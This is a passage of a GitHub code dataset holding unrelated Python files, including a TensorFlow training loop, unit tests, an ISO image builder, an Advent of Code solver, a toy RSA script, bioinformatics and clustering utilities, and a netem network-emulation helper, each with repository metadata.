ignore_index=True)\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M2, writer = writer2, session = sess2, \n dataset_0 = dataset_2,\n dataset_1 = dataset_0, dataset_2 = dataset_1)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_2 = pd.concat([dataset_2, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_2 = pd.concat([dataset_2, transfer_2_], axis=0, ignore_index=True)\n\n \n\n\n\n ##================================CONTINUE TRANSFER WEIGHTS = 1 THRE=0==============\n # WEIGHT_THRESHOLD = 0\n # transfer_0_=dataset_0.sample(n=BATCH_SIZE)\n # transfer_1_=dataset_1.sample(n=BATCH_SIZE)\n # transfer_2_=dataset_2.sample(n=BATCH_SIZE)\n # dataset_0 = pd.concat([dataset_0, transfer_1_], axis=0, ignore_index=True)\n # dataset_0 = pd.concat([dataset_0, transfer_2_], axis=0, ignore_index=True)\n # dataset_1 = pd.concat([dataset_1, transfer_0_], axis=0, ignore_index=True)\n # dataset_1 = pd.concat([dataset_1, transfer_2_], axis=0, ignore_index=True)\n # dataset_2 = pd.concat([dataset_2, transfer_0_], axis=0, ignore_index=True)\n # dataset_2 = pd.concat([dataset_2, transfer_1_], axis=0, ignore_index=True)\n\n\n\nwriter.close()\nwriter1.close()\nwriter2.close()\nwriter_tst.close()\nsess.close()\nsess1.close()\nsess2.close()\nsess_tst.close()","repo_name":"YanJiamei/distributed_learning","sub_path":"graphmodel.py","file_name":"graphmodel.py","file_ext":"py","file_size_in_byte":20471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16828176610","text":"import unittest\nimport tensorflow as tf\n\nfrom neurolib.builders.static_builder import StaticBuilder\nfrom neurolib.encoder.seq_cells import BasicEncoderCell, NormalTriLCell\n\n# pylint: disable=bad-indentation, no-member, protected-access\n\n# NUM_TESTS : 3\nrange_from = 2\nrange_to = 3\ntests_to_run = list(range(range_from, range_to))\n\n\nclass SeqCellsBasicTest(tf.test.TestCase):\n \"\"\"\n \n \"\"\"\n def setUp(self):\n \"\"\"\n \"\"\"\n print()\n tf.reset_default_graph()\n \n @unittest.skipIf(0 not in tests_to_run, \"Skipping\")\n def test_init(self):\n \"\"\"\n Create a Custom Cell\n \"\"\"\n print(\"Test 0: Custom cell init\")\n builder = StaticBuilder(scope='BuildCell')\n \n cell = BasicEncoderCell(builder, state_sizes=[[5]])\n print(\"cell.encoder\", cell.encoder)\n \n @unittest.skipIf(1 not in tests_to_run, \"Skipping\")\n def test_call(self):\n \"\"\"\n Call a Custom Cell Node\n \"\"\"\n print(\"Test 1: Custom cell call\")\n builder = StaticBuilder(scope='BuildCell')\n \n cell = BasicEncoderCell(builder, state_sizes=[[5]])\n print(\"cell.encoder\", cell.encoder)\n \n X = tf.placeholder(tf.float64, [None, 5])\n Y = tf.placeholder(tf.float64, [None, 10])\n Z = cell(X, Y)\n print(\"Z\", Z)\n \n @unittest.skipIf(2 not in tests_to_run, \"Skipping\")\n def test_NormalTriLCell(self):\n \"\"\"\n Test the NormalTriLCell Node\n \"\"\"\n print(\"Test 2: \")\n builder = StaticBuilder(scope='BuildCell')\n \n cell = NormalTriLCell(builder,\n state_sizes=[[5]])\n print(\"cell.encoder\", cell.encoder)\n \n X = tf.placeholder(tf.float64, [None, 5])\n Y = tf.placeholder(tf.float64, [None, 10])\n Z = cell(X, Y)\n print(\"Z\", Z)\n \nif __name__ == \"__main__\":\n unittest.main(failfast=True)\n ","repo_name":"dhernandd/neurolib","sub_path":"neurolib/tests/builders/test_seq_cells.py","file_name":"test_seq_cells.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16130046359","text":"from sys import argv\nfrom os import mkdir, walk\nfrom tomli import load as toml_load\ntry:\n from cStringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO\nfrom pycdlib import PyCdlib\n\nunit_objects = {}\n\n\nclass UnitConfiguration:\n def __init__(self, unit_number):\n self.unit_number = unit_number\n self.file_additions = []\n self.file_removals = []\n self.username = \"\"\n self.password = \"\"\n self.flags = {}\n\n self.generate_ssh_token()\n\n def generate_ssh_token(self):\n # Generate an ssh token for user here!\n pass\n\n def parse_global_configuration(self):\n # Check if config file provided matches the required format\n with open(\"./Data/global.toml\", \"rb\") as config_file:\n config_data = toml_load(config_file)\n # Load data into instance vars here, looping for values with multiple items?\n\n def parse_unit_specific_configuration(self):\n # Check if config file provided matches the required format\n with open(\"./Data/unit-specific.toml\", \"rb\") as config_file:\n config_data = toml_load(config_file)[self.unit_number]\n # Load data into instance vars here, looping for values with multiple items?\n\n def get_unit_number(self):\n return self.unit_number\n\n def get_file_additions(self):\n return self.file_additions\n\n def get_file_removals(self):\n return self.file_removals\n\n def get_credentials(self):\n return self.username, self.password\n\n def get_flags(self):\n return self.flags\n\n\nwith open(\"./Data/unit-specifc.toml\", \"rb\") as config_file:\n units = toml_load(config_file).keys()\n for unit in units:\n unit_objects[unit] = UnitConfiguration(unit)\n\n\ndef main():\n try:\n extract_image(argv[1], \"./Data/ImageContents\")\n except FileNotFoundError:\n print(\"Error, file provided does not exist!\")\n exit(1)\n except IndexError:\n print(\"Error, no file name provided!\")\n exit(1)\n\n\ndef extract_image(image_name, output_location):\n image = PyCdlib()\n image.open(image_name)\n directories_to_create = []\n files_to_create = []\n for path, directory_list, file_list in image.walk(iso_path=\"/\"):\n for directory in directory_list:\n directories_to_create.append(str(path + directory))\n for file in file_list:\n files_to_create.append(str(path + file))\n for directory in directories_to_create:\n mkdir(output_location + directory)\n for file in files_to_create:\n image.get_file_from_iso(output_location + file, iso_path=file)\n image.close()\n\n\ndef create_image(image_name: str, input_location):\n image_name = image_name.rstrip(\".iso\")\n for unit in unit_objects:\n image = PyCdlib()\n image.new()\n\n for path, directory_list, file_list in walk(input_location):\n for directory in directory_list:\n image.add_directory(path+directory)\n for file in file_list:\n image.add_file(file, path)\n\n # Do unit specific configurations here (i.e. for file in unit.get_file_removals())\n\n image.write(image_name + str(unit.get_unit_number()) + \".iso\")\n","repo_name":"fourteevee/4tv-deploy","sub_path":"image_generator.py","file_name":"image_generator.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41340817882","text":"from multiprocessing import Process\n\nnumber = 0\ndef change(): # 为拟创建的子进程1提供方法\n print('子进程1开始运行...')\n global number\n for i in range(5000):\n number += 1\n print('把number加5000次一等于:%d' % number)\n print('子进程1结束')\n\ndef changes(): # 为拟创建的子进程2提供方法\n print('子进程2开始运行...')\n global number\n for i in range(10000):\n number += 1\n print('把number加10000次一等于:%d' % number)\n print('子进程2结束')\n\nif __name__ == '__main__':\n process_one = Process(target=change)\n process_one.start() # 启动进程\n process_one.join() # 等待进程执行结束\n process_two = Process(target=changes)\n process_two.start() # 启动进程\n process_two.join() # 等待进程执行结束\n print('number最后为:%d' % number)","repo_name":"ALiang-NO1/python-learn","sub_path":"MyPy/线程-进程-协程/进程/03进程共用全局变量问题.py","file_name":"03进程共用全局变量问题.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42731905590","text":"from utils import read_data\nfrom typing import Tuple, Dict\n\n\ndef find_matching_parens(text: str) -> Dict[int, int]:\n paren_stack = [] # stack of indices of opening parentheses\n parens_dict = {}\n\n for i, char in enumerate(text):\n if char == '(':\n paren_stack.append(i)\n if char == ')':\n try:\n parens_dict[paren_stack.pop()] = i\n except IndexError:\n raise Exception(\"Couldn't parse parens because there are too many closing parenthesis\")\n if paren_stack: # check if stack is empty afterwards\n raise Exception(\"Couldn't parse parens because there are too many opening parentheses\")\n return parens_dict\n\n\nOP_DICT = {\n '+': lambda x, y: x + y,\n '*': lambda x, y: x * y\n}\n\n\ndef evaluate_part_one(expression: str) -> int:\n expression = expression.replace(\" \", \"\")\n parens_dict = find_matching_parens(expression)\n index = 0\n stored_number = None\n stored_op = None\n while index < len(expression):\n char = expression[index]\n if char.isnumeric():\n if stored_number is not None and stored_op is not None:\n stored_number = OP_DICT[stored_op](stored_number, int(char))\n stored_op = None\n elif stored_number is not None and stored_op is None:\n raise Exception(\"Read two numbers in a row, what do?\")\n elif stored_number is None:\n stored_number = int(char)\n index += 1\n elif char in ('+', '*'):\n if stored_op is None:\n stored_op = char\n else:\n raise Exception(\"Read two ops in a row, what do?\")\n index += 1\n elif char == '(':\n sub_problem = expression[index+1:parens_dict[index]]\n sub_value = evaluate_part_one(sub_problem)\n if stored_number is not None and stored_op is not None:\n stored_number = OP_DICT[stored_op](stored_number, sub_value)\n stored_op = None\n elif stored_number is not None and stored_op is None:\n raise Exception(\"Read two numbers in a row, what do?\")\n elif stored_number is None:\n stored_number = sub_value\n index = parens_dict[index]+1\n return stored_number\n\n\ndef get_left_num(expression: str, index: int) -> Tuple[int, int]:\n num_start = index\n while num_start - 1 >= 0 and expression[num_start - 1].isnumeric():\n num_start -= 1\n return int(expression[num_start:index]), num_start\n\n\ndef get_right_num(expression: str, index: int) -> Tuple[int, int]:\n num_end = index\n while num_end + 1 < len(expression) and expression[num_end+1].isnumeric():\n num_end += 1\n return int(expression[index+1:num_end+1]), num_end\n\n\ndef evaluate_part_two(expression: str) -> int:\n expression = expression.replace(\" \", \"\")\n while '(' in expression:\n parens = find_matching_parens(expression)\n first_paren = min(parens.keys())\n sub_problem = expression[first_paren + 1:parens[first_paren]]\n sub_value = evaluate_part_two(sub_problem)\n expression = str(sub_value).join((expression[:first_paren], expression[parens[first_paren]+1:]))\n while '+' in expression:\n plus_loc = expression.index(\"+\")\n left_num, left_num_start = get_left_num(expression, plus_loc)\n right_num, right_num_end = get_right_num(expression, plus_loc)\n expression = str(left_num+right_num).join((expression[:left_num_start], expression[right_num_end+1:]))\n while '*' in expression:\n mult_loc = expression.index(\"*\")\n left_num, left_num_start = get_left_num(expression, mult_loc)\n right_num, right_num_end = get_right_num(expression, mult_loc)\n expression = str(left_num * right_num).join((expression[:left_num_start], expression[right_num_end + 1:]))\n return int(expression)\n\n\ndef main():\n expressions = read_data().split(\"\\n\")\n print(f'Part one: {sum(evaluate_part_one(line) for line in expressions)}')\n print(f\"Part two: {sum(evaluate_part_two(line) for line in expressions)}\")\n\n\nif __name__ == '__main__':\n import time\n start = time.monotonic()\n main()\n print(f\"Time: {time.monotonic() - start}\")\n","repo_name":"coandco/advent2020","sub_path":"advent2020_day18.py","file_name":"advent2020_day18.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71366812413","text":"__author__ = 'Administrator'\n# 导入:\nimport controller.base_controller\nfrom model import order_log\nimport json\n\nsession=controller.base_controller.DBSession()\ndef update(day,page):\n new_order = order_log.OrderLog(day=day,page=page)\n # print('************************')\n # print(str(new_order))\n # shop = orders.shop(id='22',name='1',location='2',master='3',telephone='4')\n # session.add(shop)\n session.add(new_order)\n session.commit()\n session.close()","repo_name":"huzuohuyou/XiaoHengAnalysis","sub_path":"controller/order_log_controller.py","file_name":"order_log_controller.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"59642103","text":"from contextlib import contextmanager\nfrom time import perf_counter\n\n\n# using context manager decorator, this allows us to create our own context manager\n@contextmanager\ndef timing(label: str):\n \"\"\"\n times the performance of running a function\n :param label: simple label for logging\n \"\"\"\n # section before yield is where we write code before the context manager is called\n # in this case we simply record the timestamp before\n t0 = perf_counter()\n\n # in yield, this is where execution is transferred to the body of your context manager\n # for example, where arrays get created or where we can return data. In this case we\n # simply return a closure which will calculate the time\n yield lambda: (label, t1 - t0)\n\n # this is where we write code that will be executed after the context manager finishes\n # in scenarios like file handling, this is where we close files. in this case this is where\n # we get the final time\n t1 = perf_counter()\n","repo_name":"BrianLusina/PythonSnips","sub_path":"utils/context_mgrs/perf_timer.py","file_name":"perf_timer.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"38205386101","text":"import os\nimport openpyxl\nimport shutil\n\ndef ReadExcel():\n print (\"This May Take Awhile\\n\")\n DataSetPath = os.getcwd()\n DataSetPath = DataSetPath + \"\\Dataset\\mozilla_core.xlsx\"\n \n wb = openpyxl.load_workbook(DataSetPath)\n sheet = wb.active\n\n return sheet\n\n\n\n\ndef FilterResults():\n sheet = ReadExcel()\n Titles = sheet['E']\n NonFuncArr = []\n FuncArr = []\n SubStr1 = \"not working\"\n SubStr2 = \"doesnt work\"\n SubStr3 = \"fail\"\n SubStr4 = \"Crash\"\n SubStr5 = \"Broken\"\n SubStr6 = \"doesn't work\"\n SubStr7 = \"dont work\"\n SubStr8 = \"don't work\"\n\n for data in Titles:\n if type(data.value) is str:\n if SubStr1 in data.value:\n FuncArr.append(data.value)\n elif SubStr2 in data.value:\n FuncArr.append(data.value)\n elif SubStr3 in data.value:\n FuncArr.append(data.value)\n elif SubStr4 in data.value:\n FuncArr.append(data.value)\n elif SubStr5 in data.value:\n FuncArr.append(data.value)\n elif SubStr6 in data.value:\n FuncArr.append(data.value)\n elif SubStr7 in data.value:\n FuncArr.append(data.value)\n elif SubStr8 in data.value:\n FuncArr.append(data.value)\n else:\n NonFuncArr.append(data.value)\n \n\n\n #PerfArr = []\n #SubStr1 = \"slow\"\n #SubStr2 = \"hung\"\n #SubStr4 = \"hanging\"\n\n #for data in Titles:\n # if type(data.value) is str:\n # if SubStr1 in data.value:\n # PerfArr.append(data.value)\n # elif SubStr2 in data.value:\n # PerfArr.append(data.value)\n #elif SubStr3 in data.value:\n # PerfArr.append(data.value)\n #elif SubStr4 in data.value:\n # PerfArr.append(data.value)\n\n\n #SecurArr = []\n #Titles2 = sheet['C']\n #i = 0\n\n #for data in Titles2:\n # if type(data.value) is str:\n # if data.value == 'Security':\n # SecurArr.append(Titles[i].value)\n # i = i + 1\n\n #print (len(SecurArr))\n #i = 0\n #for _ in range(10):\n # print (SecurArr[i])\n # i = i + 1\n return FuncArr, NonFuncArr\n\n\ndef WriteResults():\n FuncArr, NonFuncArr = FilterResults()\n \n DataPath = os.getcwd() + \"\\\\Data\"\n if (os.path.exists(DataPath)):\n shutil.rmtree(DataPath)\n os.mkdir(DataPath)\n\n DataPathFunc = os.getcwd() + \"\\\\Data\\\\Functional\"\n if (os.path.exists(DataPathFunc)):\n shutil.rmtree(DataPathFunc)\n os.mkdir(DataPathFunc)\n\n DataPathNonFunc = os.getcwd() + \"\\\\Data\\\\Non-Functional\"\n if (os.path.exists(DataPathNonFunc)):\n shutil.rmtree(DataPathNonFunc)\n os.mkdir(DataPathNonFunc)\n\n i = 0\n for x in FuncArr:\n StringChar = str(i)\n FileName = \"FuncEx\" + StringChar + \".txt\"\n file1 = open(DataPathFunc + \"\\\\\" + FileName, \"w+\")\n file1.write(x)\n file1.close()\n i = i + 1\n\n i = 0\n stopint = 0\n for x in NonFuncArr:\n StringChar = str(i)\n FileName = \"NonFuncEx\" + StringChar + \".txt\"\n file1 = open(DataPathNonFunc + \"\\\\\" + FileName, \"w+\")\n file1.write(x)\n file1.close()\n i = i + 1\n stopint = stopint + 1\n if (stopint == 20000):\n break\n\n\n\n\n #for x in FuncArr:\n return\n\n\n\n\nif (__name__) == \"__main__\":\n WriteResults()","repo_name":"pizmiz/Bug-Classifier-App","sub_path":"AI/ManualLabel.py","file_name":"ManualLabel.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38885649368","text":"\n# function modular_pow(base, exponent, modulus)\n#\t c := 1\n# \tfor e_prime = 1 to exponent \n# \t\tc := (c * base) mod modulus\n#\treturn c\n\n\t\ndef mod_pow(base,exponent,modulus):\n\tc = 1\n\tfor e in range(exponent):\n\t\tc = (c * base) % modulus\n\treturn c\n\ndef mPow(b, e, m):\n\tr = 1\n\twhile e > 0:\n\t\tif e % 2 == 1:\n\t\t\tr = (r * b) % m\n\t\te = e >> 1\n\t\tb = (b * b ) % m\n\treturn r\n\n\n#\tecluides seive (mine)\ndef eSieve(n):\n\td = list(range(0,n))\n\tP = [1,2]\n\tp = 2\n\twhile p < n:\n\t\tm = p * p\n\t\twhile m < n:\n\t\t\td[m] = 0\n\t\t\tm += p\n\t\tm = p+1\n\t\twhile m < n and d[m] == 0:\n\t\t\tm += 1\n\t\tif m < n:\n\t\t\tp = d[m]\n\t\t\tP.append(p)\n\t\telse:\n\t\t\tbreak\n\treturn P\t\t\n\n#\tecluides seive (mine)\ndef eSieve1(n):\n\tn = int(n)\n\tP = [1]\n\td = [True] * (n+1)\t\n\tfor p in range(2, n+1):\n\t\tif d[p] :\n\t\t\tP.append(p)\n\t\t\tfor m in range(p * p , n + 1, p):\t\n\t\t\t\td[m] = False\n\treturn P\t\t\n\n\t\n# recurisive greatest common denomator from wikpedia algorithm implementation\t\t\ndef egcd(a, b):\n\t\tif a == 0:\n\t\t\treturn (b, 0, 1)\n\t\telse:\n\t\t\tg, y, x = egcd( b % a , a)\n\t\t\treturn ( g, x - (b // a) * y, y)\n\n# recurisive modular inverse from wikpedia algorithm implementation\t\t\t\ndef modinv(a,m):\n\tg,x,y = egcd(a,m)\n\tif g != 1:\n\t\treturn None\t# modular inverse does not exist\n\telse:\n\t\treturn x % m\n\t\t\t\t\n\n# make rse keys from a list of primes and an entry point\ndef make_keys(P,k):\n\tp = P[k]\n\tq = P[k+51]\n\tn = p * q \n\tt = (p-1)*(q-1)\n\ti = 10\n\tm = None\n\twhile m == None:\n\t\te = P[i]\n\t\tm = modinv(e,t)\t\n\t\ti += 1\n\t\t\n\treturn e, m, n\n\t\t\n\ndef encrypt(s, k, m):\n\tba = bytearray(s, 'utf8')\n\n\tw=[]\n\tfor b in ba:\n\t\tw.append(mPow(b,k,m))\n\treturn w\n\t\ndef decrypt(w,k,m):\n\tw=list(w)\n\ts = ''\n\tfor dw in w:\n\t\ts += chr(mPow(dw,k,m) )\n\treturn s\n\t\n\t\ndef main():\n\tP1 = eSieve(10000)\n\tPK , pk, m = make_keys(P1,1001)\n\t\n\tt1 = mPow(65,PK,m)\n\tt2 = mPow(t1,pk,m)\n\tprint(t1,t2)\n\t\n\ts1 = \"this is a test, this is not a good test, but never the less this is a test keith R. Bergerstock...\"\n\tprint(s1)\n\t\n\trsa = encrypt(s1 ,PK,m)\n\tprint(rsa)\n\t\n\tb = decrypt(rsa, pk,m)\n\tprint(b)\n\n\n\t\nif __name__ == '__main__':\n main()\n","repo_name":"kbergerstock/myProjects","sub_path":"projects.python/thinkCSpy.examples/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1051531120","text":"import Bio.SeqIO as SeqIO\n\n# for seq_record in SeqIO.parse(\"/data1/projectpy/DeepFam/seq2logo-2.1/PF00571_full_length_sequences.fasta\", \"fasta\"):\n#\n# print(seq_record.id)\n#\nclass seqObj(object):\n def __init__(self, id, desc, seq):\n self.id = id\n self.desc = desc\n self.seq = seq\n\n\n\nseq_length = 0\nseq_dict = {}\nseq_list =[]\nfirst_line = True\n#seq_list = list(SeqIO.parse(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/protease.lib\", \"fasta\"))\ni = 0\nwith open(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/protease1.lib\", 'r') as infile:\n for row in infile:\n #print(\"line:\", i)\n if row.startswith(\">\"):\n if not first_line:\n seq = \"\"\n for se in seqs:\n seq += se.rstrip()\n\n seq_list.append(seqObj(id, desc, seq))\n first_line = False\n\n seqs = []\n id, desc = row.split(\" \", 1)\n #desc = desc.rstrip()\n id = str.replace(id, \">\", \"\")\n #print(\"id:\", id)\n else:\n seqs.append(row)\n i +=1\n\n\nprint(\"total protease.lib sequence is:\", len(seq_list))\nfor seq_record in seq_list:\n if seq_record.id not in seq_dict:\n seq_dict[seq_record.id] = seq_record\n else:\n print(\"duplicate id:\", seq_record.id)\n\nprint(\"total unique protease.lib sequence is:\", len(seq_dict))\n\n\ntarget_seq = []\nali_seq_list = list(SeqIO.parse(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/c1a.fa\", \"fasta\"))\nprint(\"total c1a.fa sequence is:\", len(ali_seq_list))\nfor seq_record in ali_seq_list:\n if seq_record.id in seq_dict:\n # ali_seq_dict[seq_record.id] = seq_record.seq\n target_seq.append(seq_dict[seq_record.id])\n\nprint(\"c1a_seq.fa sequence is:\", len(target_seq))\n\nwith open(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/c1a_seq.fa\", 'w') as output_handle:\n for seqO in target_seq:\n #print(\">%s %s\" % (seqO.id, seqO.desc))\n outh = seqO.id+' '+seqO.desc\n print(outh)\n output_handle.write(outh)\n output_handle.write(\"%s\\n\" % seqO.seq)\n\n #SeqIO.write(target_seq, output_handle, \"fasta\")\n\n\n\n\n","repo_name":"mycstar/cnnTensorflow","sub_path":"CaricaPapaya/dataHandler.py","file_name":"dataHandler.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17946291250","text":"import pandas as pd\n\nlyrics = pd.read_csv('darklyrics.csv')\n\nbandalbumcountry = pd.read_csv('bandalbum.csv')\n\nfor row in bandalbumcountry.itertuples(index=True, name='Pandas'):\n band = getattr(row, 'band')\n album = getattr(row, 'album')\n country = getattr(row, 'country')\n\n newname = band + \" (\" + country.lower().capitalize() + \")\"\n\n lyrics.loc[(lyrics['band'] == band) & (lyrics['album'] == album), 'band'] = newname\n\nlyrics.to_csv('darklyrics2.csv')\n","repo_name":"lorenzomammana/metal-subgenres-classification","sub_path":"dataset-extraction/addbandname.py","file_name":"addbandname.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35086075614","text":"\"\"\"This modules contains functions to streamline optimizations.\"\"\"\n\nfrom typing import List\n\nfrom modules import analysis_util\nfrom modules import benchmark_pipeline\nfrom modules import clustering_algorithms\nfrom modules import icon_finder_shape_context\nimport numpy as np\n\n\ndef dbscan_clustering_optimizer(eps_values: List[float],\n min_samples: List[int], tfrecord_path: str,\n multi_instance_icon: bool):\n \"\"\"Plots recall given different DBSCAN clustering hyperparameters.\n\n User can check the plots to visually check what the overall trend is to\n determine what the next set of hyperpameters to try next (ie, what direction\n the recall is moving). We make a plot of min samples and recall for each\n epsilon value fixed, and we also make a final plot of epsilon and recall\n using the min sample value that maximizes recall.\n\n Arguments:\n eps_values: List of dbscan epsilon hyperparameters to try out.\n min_samples: List of dbscan min_sample hyperparameters to try out.\n tfrecord_path: The path to the dataset to run this experiment on.\n multi_instance_icon: Whether the dataset is single-instance\n or multi-instance.\n \"\"\"\n recall_eps = []\n for eps in eps_values:\n recall_min_samples = []\n for samples in min_samples:\n icon_finder = icon_finder_shape_context.IconFinderShapeContext(\n clusterer=clustering_algorithms.DBSCANClusterer(eps=eps,\n min_samples=samples))\n benchmark = benchmark_pipeline.BenchmarkPipeline(\n tfrecord_path=tfrecord_path)\n correctness, _, _ = benchmark.evaluate(\n multi_instance_icon=multi_instance_icon,\n icon_finder_object=icon_finder)\n recall_min_samples.append(correctness.recall)\n recall_eps.append(np.max(np.array(min_samples)))\n analysis_util.generate_scatterplot(\n x=min_samples,\n y=recall_min_samples,\n title=\"Effect of min samples on recall (Eps = %d)\" % eps,\n xlabel=\"Min samples\",\n ylabel=\"Recall\",\n output_path=\"min-samples-%d.png\" % eps,\n connect_points=False)\n analysis_util.generate_scatterplot(\n x=eps_values,\n y=recall_eps,\n title=\"Effect of eps on recall (Min sample = best of \" +\n \" \".join(map(str, min_samples)),\n xlabel=\"Epsilon Value\",\n ylabel=\"Recall\",\n output_path=\"best-epsilon-recall.png\",\n connect_points=False)\n\n\nif __name__ == \"__main__\":\n dbscan_clustering_optimizer(\n eps_values=[7.5, 7.6, 7.7, 7.8],\n min_samples=[2, 3, 4, 5],\n tfrecord_path=\"datasets/large_single_instance_v2.tfrecord\",\n multi_instance_icon=False)\n","repo_name":"googleinterns/acuiti","sub_path":"modules/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"9206822882","text":"from typing import Optional\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\nclass MetricTable:\n def __init__(self) -> None:\n self.frames = []\n\n def add_frame(self, frame: pd.DataFrame) -> None:\n self.frames.append(frame)\n\n # pylint: disable=too-many-arguments\n def add_to_frame(self,\n ari: float,\n ami: float,\n inertia: float,\n time: float,\n name: Optional[str] = 'Experiment'\n ) -> None:\n data = {'ARI': f'{ari:.2f}', 'AMI': f'{ami:.2f}',\n 'Inertia': f'{inertia:.2f}', 'Time': f'{time:.2f}'}\n frame = pd.DataFrame(data, [name])\n self.frames.append(frame)\n\n def add_empty_frame(self, time: bool) -> None:\n empty = 'N/A'\n data = {'ARI': empty, 'AMI': empty}\n if time:\n data['Time'] = empty\n frame = pd.DataFrame(data, [empty])\n self.frames.append(frame)\n\n def get_table(self) -> pd.DataFrame:\n return pd.concat(self.frames, join=\"inner\")\n\n def get_latex_table(self, caption: str = '') -> str:\n table = self.get_table()\n return table.to_latex(index=True, escape=True, caption=caption)\n\n\ndef insert_hline(latex_str: str) -> str:\n lines_strings = latex_str.splitlines()\n result = []\n\n for line in lines_strings:\n if 'N/A' in line:\n result.append('\\\\midrule')\n else:\n result.append(line)\n result = '\\n'.join(result)\n return result\n\n\nclass MetricMeter:\n def __init__(self) -> None:\n self.ari = []\n self.ami = []\n self.inertia = []\n self.time = []\n\n def add_ari(self, value: float) -> None:\n self.ari.append(value)\n\n def add_ami(self, value: float) -> None:\n self.ami.append(value)\n\n def add_inertia(self, value: float) -> None:\n self.inertia.append(value)\n\n def add_time(self, value: float) -> None:\n self.time.append(value)\n\n def add_combination(self, ari: float, ami: float, inertia: float, time: float) -> None:\n self.add_ari(abs(ari))\n self.add_ami(abs(ami))\n self.add_inertia(inertia)\n self.add_time(time)\n\n def get_average(self) -> tuple[float, float, float, float]:\n return float(np.mean(self.ari)), float(np.mean(self.ami)), \\\n float(np.mean(self.inertia)), float(np.mean(self.time))\n\n\nclass GraphicMeter(MetricMeter):\n def __init__(self, base: list, base_name: str) -> None:\n super().__init__()\n self.base = base\n self.base_name = base_name\n\n def get_graph(self, key: str):\n values = {'ARI': self.ari, 'AMI': self.ami,\n 'Inertia': self.inertia, 'Time': self.time}\n\n fig, ax = plt.subplots(figsize=(5, 4))\n param = values[key]\n ax.plot(self.base, param, '-o')\n ax.grid(True, color='gray', linestyle='--', linewidth=0.5)\n\n if self.base_name == 'p':\n ax.set_xticks(self.base)\n else:\n ax.set_xticks(np.linspace(0, 1, 11))\n ax.set_xlabel(self.base_name)\n\n if key in ('ARI', 'AMI'):\n ax.set_yticks(np.arange(0, 1.1, 0.1))\n else:\n ax.set_yticks(np.linspace(np.min(param), np.max(param), 10))\n ax.set_ylabel(key)\n # ax.set_title(f'{key} vs. {self.base_name}')\n return fig\n","repo_name":"alexgiving/LKMeans","sub_path":"lkmeans/report/metric_meter.py","file_name":"metric_meter.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34019423300","text":"from lib.command import Command\r\nimport sys\r\nimport getopt\r\n\r\nif __name__ == '__main__':\r\n opts, args = getopt.getopt(sys.argv[1:], 'g', ['gui'])\r\n for o, a in opts:\r\n if o in ('-g', '--gui'):\r\n from lib.gui.main_window import MainWindow\r\n MainWindow()\r\n sys.exit()\r\n argv = []\r\n kw = {}\r\n for a in args:\r\n if '=' in a:\r\n k, v = a.split('=')\r\n kw[k] = v\r\n else:\r\n argv.append(a)\r\n\r\n Command(*argv, **kw)()\r\n","repo_name":"tsaiminghan/pyGNovelDL","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"665604956","text":"import subprocess\nimport re\n\ndef get_my_ip():\n response = subprocess.Popen(['ip', 'addr', 'show'],\n stdout=subprocess.PIPE).stdout.read().decode('utf-8')\n ips = re.findall(r'172\\.\\d+\\.\\d+\\.\\d+', response)\n return ips[0]\n\ndef update_emulation_engine(params):\n if params['loss_model'] == 'random':\n loss_cmd = '' if params[\"loss\"] == '0' else f'loss random {params[\"loss\"]}'\n elif params['loss_model'] == 'gi':\n P = float(params['P'])\n E_B = float(params['E_B'])\n rho = float(params['rho'])\n P_isol = float(params['P_isol'])\n E_GB = float(params['E_GB'])\n p31 = 100 * 1 / (E_B * rho)\n p13 = 100 * (P - P_isol)/(E_B * (1 - P_isol) * (rho - P))\n p23 = 100 * 1 / (E_GB)\n p32 = 100 * (1 - rho) / (rho * E_GB)\n p14 = 100 * P_isol / (1 - P_isol)\n loss_cmd = f'loss state {p13} {p31} {p32} {p23} {p14}'\n cmd = [\n 'tc qdisc replace dev eth0 root netem',\n f'delay {params[\"latency\"]}ms',\n '' if params[\"jitter\"] == '0' else f'{params[\"jitter\"]}ms distribution 